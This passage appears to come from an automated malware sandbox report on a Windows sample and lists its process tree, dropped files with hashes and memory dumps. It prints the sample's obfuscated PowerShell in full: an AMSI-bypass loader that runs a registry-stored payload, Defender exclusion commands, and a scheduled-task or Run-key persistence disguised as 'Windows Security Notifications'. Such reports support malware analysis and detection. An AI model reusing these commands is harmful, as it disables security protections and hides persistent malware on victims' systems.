'l'+'e'+''+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4840
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ErxhWITlSwKe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KkRxzbIKJruSxX,[Parameter(Position=1)][Type]$ekVpKjIxBu)$TFsWkKTguds=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+'y'+'M'+'odu'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+'eg'+'a'+''+[Char](116)+''+'e'+'T'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+'ass'+','+'Pu'+[Char](98)+''+[Char](108)+'ic'+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$TFsWkKTguds.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KkRxzbIKJruSxX).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$TFsWkKTguds.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+'wS'+[Char](108)+''+'o'+''+'t'+''+','+'V'+'i'+'r'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$ekVpKjIxBu,$KkRxzbIKJruSxX).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $TFsWkKTguds.CreateType();}$xnKPlAznYMHwx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType('M'+[Char](105)+'cr'+'o'+''+'s'+''+'o'+''+[Char](102)+'t.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'x'+'nK'+[Char](80)+''+[Char](108)+'Azn'+[Char](89)+''+[Char](77)+'H'+'w'+''+[Char](120)+'');$pEyhbBvnLAJxnF=$xnKPlAznYMHwx.GetMethod('p'+'E'+'y'+'h'+''+[Char](98)+'B'+[Char](118)+''+[Char](110)+''+[Char](76)+''+[Char](65)+''+[Char](74)+''+'x'+''+[Char](110)+'F',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EvRCEWlcTAZDvTMosSn=ErxhWITlSwKe @([String])([IntPtr]);$QtiSNAOkjdvvtPDgaiSxws=ErxhWITlSwKe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vuwbaRqhXuk=$xnKPlAznYMHwx.GetMethod(''+[Char](71)+'etM'+[Char](111)+''+'d'+'ul'+'e'+''+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$YOIIKTNUkQJblM=$pEyhbBvnLAJxnF.Invoke($Null,@([Object]$vuwbaRqhXuk,[Object](''+[Char](76)+'oadL'+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$ANTjCbblhKASmoASz=$pEyhbBvnLAJxnF.Invoke($Null,@([Object]$vuwbaRqhXuk,[Object]('Virt'+[Char](117)+'a'+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$GiciVaT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YOIIKTNUkQJblM,$EvRCEWlcTAZDvTMosSn).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'ll');$GYNUTHKmqltfVLjSb=$pEyhbBvnLAJxnF.Invoke($Null,@([Object]$GiciVaT,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$qDJnDabVGm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ANTjCbblhKASmoASz,$QtiSNAOkjdvvtPDgaiSxws).Invoke($GYNUTHKmqltfVLjSb,[uint32]8,4,[ref]$qDJnDabVGm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GYNUTHKmqltfVLjSb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ANTjCbblhKASmoASz,$QtiSNAOkjdvvtPDgaiSxws).Invoke($GYNUTHKmqltfVLjSb,[uint32]8,0x20,[ref]$qDJnDabVGm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue(''+'d'+''+'i'+''+[Char](97)+'l'+[Char](101)+'r'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3968

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1132

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1292
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2452

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1572

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2696

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:5008

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:3976

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3916
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3916 -s 788
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:3616

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3756 -s 864
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:3996
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3756 -s 840
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:688

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2112
- C:\Users\Admin\AppData\Local\Temp\73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
  "C:\Users\Admin\AppData\Local\Temp\73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3832
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#spcazkzgj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Windows Security Notifications' /tr '''C:\Program Files\WinDefender\SecurityHealthSystray.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WinDefender\SecurityHealthSystray.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Security Notifications' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Notifications" /t REG_SZ /f /d 'C:\Program Files\WinDefender\SecurityHealthSystray.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4324
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zdald#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Windows Security Notifications" } Else { "C:\Program Files\WinDefender\SecurityHealthSystray.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn Windows Security Notifications
    3⤵
    PID:4632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2668

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2624

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2612

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2172

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1984

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1972

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3524

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER108C.tmp.csv

Filesize
29KB

MD5
782a57f691a5d928cb5f6a4b2c9ce804

SHA1
b0ba16ff494f2f9356342a3f4fac024b3655ac61

SHA256
a1f9a98c5cfea2fbe18279975098e4fdc9ecccc59f031642c426c140c55fa633

SHA512
af0ee30a6ec697975d230e245a1b3eec496f2c724ff6ca9e2cd5fc49c9320242cc739f7c3174024241c77bd2eb97a66567540685efe53312657d32737f8229eb

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER10AC.tmp.txt

Filesize
12KB

MD5
c27361a71c9d7fca5e30e24db87fa724

SHA1
c208c6462032b1c9663d2db215aa49bc605cceb1

SHA256
582e44cac3ebbcbb53c30831d40fa25eee1822a02f535b8c08c879e2a5f2f272

SHA512
4ffebd05c78d7e5a57d52981cd0ed20d5d385ae22dfe50c398d9b6d9398025c861b0f9bf9cb90adc23ae731f9b1db4430ca46f7e31dec496a0cf849ed4ff5880

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCB.tmp.csv

Filesize
31KB

MD5
1212988da0838504e6a91ccda61f77cc

SHA1
453ea1c9b695ff08e0a686b5b544268403e55879

SHA256
c530bca5638f6dda2ea387cc9e7ea4ba4d790d3d1bc5f638a2457b302f47bd9d

SHA512
658c0d2d5e5bf56523c0bfe0627bfd1581a11027c2c95280fe7591965496e5e3de709340eac6927baab6b0d4db4fc2579b9b9fe6bcbdfcf453ef4fb9d9219112

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0B.tmp.txt

Filesize
12KB

MD5
f4a078b15e398159695c810873ca8062

SHA1
3a32697b749c08b7f2a81864390418d2d08eb310

SHA256
7bb71b2ada07462e45012f61a022b773d82ab3d3efecbdee7daaafe6f368293b

SHA512
7ce763e66a38811f94b523570860ed84e541d5aeca2d6ac54bdcf3f43b5022f1c9438523f6423e557f7e3d22c36ad4adbcf0fd8a8fd6aa79f2042429fa30a5ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dc5aeaa504ac227a932ea90ac96f6e8a

SHA1
77d7abd346f122859c983bd810415331fedf4a4e

SHA256
39f3d1fd80f57b31c5bd95c06ce2a5ae1aafc8c53c9c57233cd4681d2500bcd2

SHA512
4bc6b09f0d7c5e24ed499585cc0d5ccd1ddf8889e94886ad47f0a071aa6fdab6facdf569f7f505eb54ca35d8e4bbf544bb1960bc133fb299a16e2cb8ac3edfda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5f307f547c0823ae7aac535837df2c18

SHA1
d57826fea8e26dcb4d3cbb79bdffbd58e8c242c6

SHA256
aa79af8151e552586800c161fad0ea65d17a63c5799ba91f3c81a3d5966d8cd7

SHA512
d28e7160bc5480a5066110dfe938585ffc0d4357420398522bc4f3c67bdd445ac035af7d809ac9e99164c2b42336ed2655245da0f5938c2d39f6dc1adbd0d334

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
7b1d6a1e1228728a16b66c3714aa9a23

SHA1
8b59677a3560777593b1fa7d67465bbd7b3bc548

SHA256
3f15965d0159a818849134b3fbb016e858ac50efdf67bfcd762606ac51831bc5

SHA512
573b68c9865416ea2f9cf5c614fcedbfe69c67bd572bacec81c1756e711bd90fcfee93e17b74fb294756adf67ad18845a56c87f7f870940cbaeb3a579146a3b6

Download Submit
memory/336-382-0x000001EE5F040000-0x000001EE5F067000-memory.dmp

Filesize
156KB

Download
memory/356-383-0x0000028AAD9D0000-0x0000028AAD9F7000-memory.dmp

Filesize
156KB

Download
memory/384-384-0x000001AD4DE40000-0x000001AD4DE67000-memory.dmp

Filesize
156KB

Download
memory/568-374-0x000001FD74040000-0x000001FD74061000-memory.dmp

Filesize
132KB

Download
memory/568-317-0x00007FF851770000-0x00007FF851780000-memory.dmp

Filesize
64KB

Download
memory/568-376-0x000001FD74070000-0x000001FD74097000-memory.dmp

Filesize
156KB

Download
memory/580-316-0x00007FF88F840000-0x00007FF88F8EE000-memory.dmp

Filesize
696KB

Download
memory/580-315-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/580-311-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/580-314-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/580-312-0x0000000140002314-mapping.dmp

Download
memory/580-372-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/580-369-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/624-378-0x000002584DB30000-0x000002584DB57000-memory.dmp

Filesize
156KB

Download
memory/688-501-0x0000000000000000-mapping.dmp

Download
memory/720-392-0x000001E93FE80000-0x000001E93FEA7000-memory.dmp

Filesize
156KB

Download
memory/900-381-0x000001E8E42E0000-0x000001E8E4307000-memory.dmp

Filesize
156KB

Download
memory/988-379-0x000002485D3E0000-0x000002485D407000-memory.dmp

Filesize
156KB

Download
memory/1032-385-0x0000025A7BC50000-0x0000025A7BC77000-memory.dmp

Filesize
156KB

Download
memory/1096-386-0x000001F46DAD0000-0x000001F46DAF7000-memory.dmp

Filesize
156KB

Download
memory/1132-389-0x00000254A2590000-0x00000254A25B7000-memory.dmp

Filesize
156KB

Download
memory/1208-390-0x000002DA40D40000-0x000002DA40D67000-memory.dmp

Filesize
156KB

Download
memory/1216-395-0x0000022578B50000-0x0000022578B77000-memory.dmp

Filesize
156KB

Download
memory/1292-397-0x000001203EBD0000-0x000001203EBF7000-memory.dmp

Filesize
156KB

Download
memory/1332-406-0x00000274DDBD0000-0x00000274DDBF7000-memory.dmp

Filesize
156KB

Download
memory/1388-405-0x0000024627AD0000-0x0000024627AF7000-memory.dmp

Filesize
156KB

Download
memory/1400-404-0x0000028E318B0000-0x0000028E318D7000-memory.dmp

Filesize
156KB

Download
memory/1460-403-0x0000028B84E80000-0x0000028B84EA7000-memory.dmp

Filesize
156KB

Download
memory/1468-402-0x000001B9842A0000-0x000001B9842C7000-memory.dmp

Filesize
156KB

Download
memory/1572-401-0x000002F2AE9D0000-0x000002F2AE9F7000-memory.dmp

Filesize
156KB

Download
memory/1604-400-0x000002A897CA0000-0x000002A897CC7000-memory.dmp

Filesize
156KB

Download
memory/1624-399-0x000001EEA0910000-0x000001EEA0937000-memory.dmp

Filesize
156KB

Download
memory/1732-412-0x000001AEAD400000-0x000001AEAD427000-memory.dmp

Filesize
156KB

Download
memory/1740-398-0x00000190B76A0000-0x00000190B76C7000-memory.dmp

Filesize
156KB

Download
memory/1756-413-0x00000216818D0000-0x00000216818F7000-memory.dmp

Filesize
156KB

Download
memory/1852-414-0x00000165D1B40000-0x00000165D1B67000-memory.dmp

Filesize
156KB

Download
memory/1912-415-0x000001F478950000-0x000001F478977000-memory.dmp

Filesize
156KB

Download
memory/1972-418-0x0000000001700000-0x0000000001727000-memory.dmp

Filesize
156KB

Download
memory/1984-419-0x0000018AB7B60000-0x0000018AB7B87000-memory.dmp

Filesize
156KB

Download
memory/2112-380-0x00000000006F0000-0x0000000000717000-memory.dmp

Filesize
156KB

Download
memory/2172-420-0x0000012FDD310000-0x0000012FDD337000-memory.dmp

Filesize
156KB

Download
memory/2384-421-0x0000021300500000-0x0000021300527000-memory.dmp

Filesize
156KB

Download
memory/2408-422-0x00000229F84C0000-0x00000229F84E7000-memory.dmp

Filesize
156KB

Download
memory/2428-424-0x000002656BA50000-0x000002656BA77000-memory.dmp

Filesize
156KB

Download
memory/2452-425-0x000001E7C49D0000-0x000001E7C49F7000-memory.dmp

Filesize
156KB

Download
memory/2460-433-0x000001ECFFE60000-0x000001ECFFE87000-memory.dmp

Filesize
156KB

Download
memory/2596-432-0x0000023860AB0000-0x0000023860AD7000-memory.dmp

Filesize
156KB

Download
memory/2612-431-0x0000013AAF200000-0x0000013AAF227000-memory.dmp

Filesize
156KB

Download
memory/2624-430-0x000001F9367D0000-0x000001F9367F7000-memory.dmp

Filesize
156KB

Download
memory/2668-434-0x0000023CC21D0000-0x0000023CC21F7000-memory.dmp

Filesize
156KB

Download
memory/2680-428-0x0000014FB4670000-0x0000014FB4697000-memory.dmp

Filesize
156KB

Download
memory/2696-429-0x0000021938CC0000-0x0000021938CE7000-memory.dmp

Filesize
156KB

Download
memory/2740-427-0x0000022512C30000-0x0000022512C57000-memory.dmp

Filesize
156KB

Download
memory/3180-388-0x0000016F4B170000-0x0000016F4B197000-memory.dmp

Filesize
156KB

Download
memory/3500-154-0x0000000000000000-mapping.dmp

Download
memory/3512-426-0x000001C241040000-0x000001C241067000-memory.dmp

Filesize
156KB

Download
memory/3616-396-0x000002153D4F0000-0x000002153D517000-memory.dmp

Filesize
156KB

Download
memory/3616-375-0x0000000000000000-mapping.dmp

Download
memory/3616-394-0x000002153D430000-0x000002153D457000-memory.dmp

Filesize
156KB

Download
memory/3832-122-0x000002DD77510000-0x000002DD77532000-memory.dmp

Filesize
136KB

Download
memory/3832-126-0x000002DD78660000-0x000002DD786D6000-memory.dmp

Filesize
472KB

Download
memory/3968-387-0x0000018C1E8F0000-0x0000018C1E917000-memory.dmp

Filesize
156KB

Download
memory/3984-303-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3984-409-0x00007FF88F840000-0x00007FF88F8EE000-memory.dmp

Filesize
696KB

Download
memory/3984-308-0x00007FF88F840000-0x00007FF88F8EE000-memory.dmp

Filesize
696KB

Download
memory/3984-301-0x0000017CEBE40000-0x0000017CEBE66000-memory.dmp

Filesize
152KB

Download
memory/3984-411-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3984-410-0x0000017CEC4D0000-0x0000017CEC4F7000-memory.dmp

Filesize
156KB

Download
memory/3984-368-0x00007FF88F840000-0x00007FF88F8EE000-memory.dmp

Filesize
696KB

Download
memory/3984-321-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3996-371-0x0000000000000000-mapping.dmp

Download
memory/4080-164-0x0000000000000000-mapping.dmp

Download
memory/4100-190-0x00007FF69DB91938-mapping.dmp

Download
memory/4432-162-0x0000000000000000-mapping.dmp

Download
memory/4632-208-0x0000000000000000-mapping.dmp

Download
memory/4840-250-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-331-0x0000000006D00000-0x0000000006D66000-memory.dmp

Filesize
408KB

Download
memory/4840-310-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-309-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-307-0x0000000005EF0000-0x0000000005F12000-memory.dmp

Filesize
136KB

Download
memory/4840-306-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-305-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-304-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-302-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-291-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-292-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-293-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-294-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-295-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4840-296-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
